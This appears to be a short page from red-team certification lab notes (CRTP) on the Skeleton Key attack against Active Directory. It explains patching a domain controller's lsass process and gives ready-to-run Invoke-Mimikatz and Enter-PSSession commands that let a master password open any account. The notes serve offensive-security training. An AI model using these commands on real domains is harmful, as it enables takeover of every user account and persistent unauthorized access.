search

Skeleton Key

Skeleton Key attack bypasses AD authentication by injecting a master password into the DC. We can access any user using this master password.

hashtag
Skeleton Key

Skeleton Key is an attack where it is possible to patch DC (lsass process) so that it allows access as any user with a single password.

It is not opsec safe at all. Skeleton Key is known to cause issues with ADCS.

# Use the below command to inject a skeleton key (password would be mimikatz) on a Domain Controller of choice. DA privileges required
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

# Now, it is possible to access any machine with a valid username and password as "mimikatz"
Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator
PreviousCRTP Lab 10NextDSRM

Last updated